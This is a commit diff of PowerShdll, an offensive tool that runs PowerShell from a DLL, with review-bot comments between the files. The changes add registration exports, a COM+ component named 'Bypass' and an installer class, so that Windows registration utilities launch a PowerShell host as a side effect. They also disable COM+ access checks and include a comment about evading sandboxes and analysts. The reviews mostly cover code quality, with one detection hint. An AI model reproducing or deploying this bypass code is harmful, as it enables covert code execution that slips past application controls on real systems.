Projects STRLCPY PowerShdll Commits eeaed2fe
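--- a/dll/Common.cs
+++ b/dll/Common.cs
@@ -91,6 +91,9 @@
  }
 
  class PowerShdll{
+ [DllImport("kernel32.dll")]
+ static extern IntPtr GetConsoleWindow();
+
  Process pp;
  PS ps;
  public PowerShdll() {
@@ -102,7 +105,7 @@
  }
  public void interact()
  {
- Console.WriteLine("PowerShdll.dll v0.1");
+ Console.WriteLine("PowerShdll.dll");
  string cmd = "";
  while (cmd.ToLower() != "exit")
  {
@@ -149,8 +152,9 @@
  Console.SetCursorPosition(0, Console.CursorTop + 2);
  Console.WriteLine("Usage:");
  Console.WriteLine("rundll32 PowerShdll,main <script>");
+ Console.WriteLine("rundll32 PowerShdll,main -h\t Display this message");
  Console.WriteLine("rundll32 PowerShdll,main -f <path>\t Run the script passed as argument");
- Console.WriteLine("rundll32 PowerShdll,main -w\t Start an interactive console in a new window");
+ Console.WriteLine("rundll32 PowerShdll,main -w\t Start an interactive console in a new window (Default)");
  Console.WriteLine("rundll32 PowerShdll,main -i\t Start an interactive console in this console");
  Console.WriteLine("\nIf you do not have an interractive console, use -n to avoid crashes on output");
 
@@ -159,7 +163,11 @@
  int i=0;
  bool useConsole = true;
  string ret;
- if (args[i]=="") { usage(); return; }
+ if (args.Length == 0)
+ {
+ PSConsole.getNewConsole();
+ this.interact();
+ }
  if (args[i] == "-n")
  {
  i++;
@@ -167,9 +175,9 @@
  }
  if (args[i] == "-h")
  {
- usage();
+ usage();return;
  }
- else if (args[i] == "-w")
+ else if (args[i] == "-w" || args[i]=="")
  {
  PSConsole.getNewConsole();
  this.interact();
@@ -180,7 +188,8 @@
  pp.Suspend();
  PSConsole.stealConsole(pp);
  Console.Title = "PowerShdll";
- Console.CancelKeyPress += delegate {
+ Console.CancelKeyPress += delegate
+ {
  this.cleanup();
  };
  Console.SetCursorPosition(0, Console.CursorTop + 1);
@@ -204,21 +213,24 @@
  if (script != "error")
  {
  ret = ps.exe(script);
- if (useConsole) {
+ if (useConsole)
+ {
  pp = Process.GetCurrentProcess().Parent();
  PSConsole.stealConsole(pp);
- Console.CancelKeyPress += delegate {
+ Console.CancelKeyPress += delegate
+ {
  this.cleanup();
  };
  Console.SetCursorPosition(0, Console.CursorTop + 1);
  Console.WriteLine(ret);
  }
- }
+ }
  }
  else
- {
- string script = string.Join(" ",args, i, args.Length-i);
- if (script[0] == '"' && script[script.Length - 1] == '"') {
+ {
+ string script = string.Join(" ", args, i, args.Length - i);
+ if (script[0] == '"' && script[script.Length - 1] == '"')
+ {
  script = script.Substring(1, script.Length - 2);
  }
  ret = ps.exe(script);
@@ -226,7 +238,8 @@
  {
  pp = Process.GetCurrentProcess().Parent();
  PSConsole.stealConsole(pp);
- Console.CancelKeyPress += delegate {
+ Console.CancelKeyPress += delegate
+ {
  this.cleanup();
  };
  Console.SetCursorPosition(0, Console.CursorTop + 1);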
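Review bot: The new empty-argument branch (`if (args.Length == 0) { PSConsole.getNewConsole(); this.interact(); }`) has no `return`, so once `interact()` returns, control falls through to `if (args[i] == "-n")` and indexes an empty array, which would throw `IndexOutOfRangeException`. The exe variant in this same commit writes `{ this.interact(); return; }`; the DLL branch should end with `return;` as well. The later `args[i]` and `script[0]` accesses are likewise reached without a length check after `i++`, so a guard such as `if (i >= args.Length) { usage(); return; }` before indexing would make the parser safe on short input. The method's signature and the lines between the shown hunks are outside the diff, so this is based only on the visible lines.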
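--- a/dll/PowerShdll.csproj
+++ b/dll/PowerShdll.csproj
@@ -23,6 +23,7 @@
  <DefineConstants>DEBUG;TRACE</DefineConstants>
  <ErrorReport>prompt</ErrorReport>
  <WarningLevel>4</WarningLevel>
+ <Prefer32Bit>false</Prefer32Bit>
  </PropertyGroup>
  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
  <PlatformTarget>AnyCPU</PlatformTarget>
@@ -32,6 +33,7 @@
  <DefineConstants>TRACE</DefineConstants>
  <ErrorReport>prompt</ErrorReport>
  <WarningLevel>4</WarningLevel>
+ <Prefer32Bit>false</Prefer32Bit>
  </PropertyGroup>
  <PropertyGroup>
  <StartupObject />
@@ -44,6 +46,7 @@
  <PlatformTarget>x64</PlatformTarget>
  <ErrorReport>prompt</ErrorReport>
  <CodeAnalysisRuleSet>MinimumRecommendedRules.ruleset</CodeAnalysisRuleSet>
+ <Prefer32Bit>false</Prefer32Bit>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|x64'">
  <OutputPath>bin\x64\Release\</OutputPath>
@@ -53,6 +56,7 @@
  <PlatformTarget>x64</PlatformTarget>
  <ErrorReport>prompt</ErrorReport>
  <CodeAnalysisRuleSet>MinimumRecommendedRules.ruleset</CodeAnalysisRuleSet>
+ <Prefer32Bit>false</Prefer32Bit>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|x86'">
  <DebugSymbols>true</DebugSymbols>
@@ -62,6 +66,7 @@
  <PlatformTarget>x86</PlatformTarget>
  <ErrorReport>prompt</ErrorReport>
  <CodeAnalysisRuleSet>MinimumRecommendedRules.ruleset</CodeAnalysisRuleSet>
+ <Prefer32Bit>false</Prefer32Bit>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|x86'">
  <OutputPath>bin\x86\Release\</OutputPath>
@@ -71,6 +76,13 @@
  <PlatformTarget>x86</PlatformTarget>
  <ErrorReport>prompt</ErrorReport>
  <CodeAnalysisRuleSet>MinimumRecommendedRules.ruleset</CodeAnalysisRuleSet>
+ <Prefer32Bit>false</Prefer32Bit>
+ </PropertyGroup>
+ <PropertyGroup>
+ <SignAssembly>true</SignAssembly>
+ </PropertyGroup>
+ <PropertyGroup>
+ <AssemblyOriginatorKeyFile>BullShit.pfx</AssemblyOriginatorKeyFile>
  </PropertyGroup>
  <ItemGroup>
  <Reference Include="RGiesecke.DllExport.Metadata, Version=1.0.0.0, Culture=neutral, PublicKeyToken=8f52d83c1a22df51, processorArchitecture=MSIL">
@@ -84,7 +96,9 @@
  <Reference Include="Microsoft.CSharp" />
  <Reference Include="System.Data" />
  <Reference Include="System.Net.Http" />
+ <Reference Include="System.Configuration.Install" />
  <Reference Include="System.Xml" />
+ <Reference Include="System.EnterpriseServices" />
  <Reference Include="System.Management.Automation, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL">
  <SpecificVersion>False</SpecificVersion>
  <HintPath>..\..\..\..\..\..\..\Program Files\Reference Assemblies\Microsoft\WindowsPowerShell\v1.0\System.Management.Automation.dll</HintPath>
@@ -97,6 +111,7 @@
  </ItemGroup>
  <ItemGroup>
  <None Include="App.config" />
+ <None Include="BullShit.pfx" />
  <None Include="packages.config" />
  </ItemGroup>
  <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />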
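Review bot: The strong-name private key is checked in with the source, since `<AssemblyOriginatorKeyFile>BullShit.pfx</AssemblyOriginatorKeyFile>` is paired with `<None Include="BullShit.pfx" />`, which makes the key a tracked project file. A strong name produced from a key that anyone can download gives the assembly a stable identity only; it says nothing about who built a given binary and should not be read as a provenance or trust signal for the DLLs under `dll/bin/` that this commit also updates. If the key is meant to be a throwaway, say so next to `SignAssembly`, for example `<!-- throwaway strong-name key; not a trust anchor -->`; otherwise keep the .pfx out of the repository and supply it at build time.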
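--- a/dll/Program.cs
+++ b/dll/Program.cs
@@ -1,22 +1,89 @@
 using System;
 using System.Runtime.InteropServices;
 using RGiesecke.DllExport;
+using System.Configuration.Install;
+using System.Diagnostics;
+using System.Reflection;
+using System.EnterpriseServices;
 
 //https://blogs.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/
 
+[assembly: ApplicationActivation(ActivationOption.Server)]
+[assembly: ApplicationAccessControl(false)]
+
 namespace Powershdll
 {
- public static class UtilDLL
+ public class Program
  {
- public static void useless() {
+ public static void Main()
+ {
+ Console.WriteLine("Hello From Main...I Don't Do Anything");
+ //Add any behaviour here to throw off sandbox execution/analysts :)
  }
+
+ }
+ public static class UtilDLL
+ {
  [DllExport("main", CallingConvention = CallingConvention.Cdecl)]
  public static void main(IntPtr hwnd, IntPtr hinst, string lpszCmdLine, int nCmdShow)
  {
  PowerShdll psdl = new PowerShdll();
  psdl.start(lpszCmdLine.Split(' '));
  }
+
+ [DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)]
+ public static void DllRegisterServer()
+ {
+ PowerShdll psdl = new PowerShdll();
+ psdl.start(new string[0]);
+ }
+ [DllExport("DllUnregisterServer", CallingConvention = CallingConvention.StdCall)]
+ public static void DllUnregisterServer()
+ {
+ PowerShdll psdl = new PowerShdll();
+ psdl.start(new string[0]);
+ }
  }
+
+ [System.ComponentModel.RunInstaller(true)]
+ public class Thing1 : System.Configuration.Install.Installer
+ {
+ //The Methods can be Uninstall/Install. Install is transactional, and really unnecessary.
+ public override void Uninstall(System.Collections.IDictionary savedState)
+ {
+ }
+
+ }
+
+ [ComVisible(true)]
+ [Guid("31D2B969-7608-426E-9D8E-A09FC9A51680")]
+ [ClassInterface(ClassInterfaceType.None)]
+ [ProgId("dllguest.Bypass")]
+ [Transaction(TransactionOption.Required)]
+ public class Bypass : ServicedComponent
+ {
+ public Bypass() { }
+
+ [ComRegisterFunction] //This executes if registration is successful
+ public static void RegisterClass(string key)
+ {
+ PowerShdll psdl = new PowerShdll();
+ psdl.start(new string[0]);
+ }
+
+ [ComUnregisterFunction] //This executes if registration fails
+ public static void UnRegisterClass(string key)
+ {
+ PowerShdll psdl = new PowerShdll();
+ psdl.start(new string[0]);
+ }
+
+ public void Exec() {
+ PowerShdll psdl = new PowerShdll();
+ psdl.start(new string[0]);
+ }
+ }
+
 
 }
 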
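Review bot: `[assembly: ApplicationAccessControl(false)]` turns off COM+ access checks for the whole serviced-component application and is added with no comment saying why; it and `ApplicationActivation(ActivationOption.Server)` each need a line of explanation at the attribute. The comment on `[ComUnregisterFunction]` (`//This executes if registration fails`) is also misleading, because the attribute's documented contract is that the method is called when the assembly is unregistered; `// runs when the assembly is unregistered` would be accurate. `DllRegisterServer`, `DllUnregisterServer`, `RegisterClass`, `UnRegisterClass` and `Exec` all repeat the same two lines (`PowerShdll psdl = new PowerShdll(); psdl.start(new string[0]);`), so registering or unregistering the DLL starts the host as a side effect; one private helper with a doc comment stating that would make the behaviour visible to a reader. For anyone triaging this binary, the consequence is that the PowerShell engine can end up loaded inside a registration utility's process rather than powershell.exe, so image-load telemetry for System.Management.Automation in unexpected processes is the place to look.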
  • dll/bin/Release/PowerShdll.dll
    Binary file.
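--- a/dll/bin/Release/PowerShdll.dll.config
+++ b/dll/bin/Release/PowerShdll.dll.config
@@ -0,0 +1,7 @@
+<?xml version="1.0" encoding="utf-8"?>
+<configuration>
+ <startup>
+
+ <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.6.1"/></startup>
+</configuration>
+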
  • dll/bin/x64/Release/PowerShdll.dll
    Binary file.
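--- a/dll/bin/x64/Release/PowerShdll.dll.config
+++ b/dll/bin/x64/Release/PowerShdll.dll.config
@@ -1,6 +1,7 @@
-<?xml version="1.0" encoding="utf-8" ?>
+<?xml version="1.0" encoding="utf-8"?>
 <configuration>
  <startup>
- <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" />
- </startup>
+
+ <supportedRuntime version="v2.0.50727"/></startup>
 </configuration>
+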
  • dll/bin/x86/Release/PowerShdll.dll
    Binary file.
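--- a/exe/Common.cs
+++ b/exe/Common.cs
@@ -19,7 +19,7 @@
  }
  public void interact()
  {
- Console.WriteLine("PowerShdll.dll v0.1");
+ Console.WriteLine("PowerShdll.dll");
  string cmd = "";
  while (cmd.ToLower() != "exit")
  {
@@ -55,12 +55,13 @@
  {
  Console.WriteLine("Usage:");
  Console.WriteLine("PowerShdll.exe <script>");
+ Console.WriteLine("PowerShdll.exe -h\t Display this messages");
  Console.WriteLine("PowerShdll.exe -f <path>\t Run the script passed as argument");
- Console.WriteLine("PowerShdll.exe -i\t Start an interactive console");
+ Console.WriteLine("PowerShdll.exe -i\t Start an interactive console (Default)");
  }
  public void start(string[] args)
  {
- if (args.Length==0) { usage(); return; }
+ if (args.Length==0) { this.interact(); return; }
  else if (args[0] == "-h")
  {
  usage();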
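Review bot: The added help line `Console.WriteLine("PowerShdll.exe -h\t Display this messages");` has a typo; the DLL usage text in this same commit reads `Display this message`, and the two should match. The banner in `interact()` is changed to `"PowerShdll.dll"` here as well, although this file builds the exe, which looks like a carry-over from dll/Common.cs. Both `interact()` and `start()` continue past the lines shown.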
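--- a/exe/PowerShdllExe.csproj
+++ b/exe/PowerShdllExe.csproj
@@ -23,6 +23,7 @@
  <DefineConstants>DEBUG;TRACE</DefineConstants>
  <ErrorReport>prompt</ErrorReport>
  <WarningLevel>4</WarningLevel>
+ <Prefer32Bit>false</Prefer32Bit>
  </PropertyGroup>
  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
  <PlatformTarget>AnyCPU</PlatformTarget>
@@ -32,6 +33,7 @@
  <DefineConstants>TRACE</DefineConstants>
  <ErrorReport>prompt</ErrorReport>
  <WarningLevel>4</WarningLevel>
+ <Prefer32Bit>false</Prefer32Bit>
  </PropertyGroup>
  <PropertyGroup>
  <StartupObject />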
  • exe/bin/Release/Powershdll.exe
    Binary file.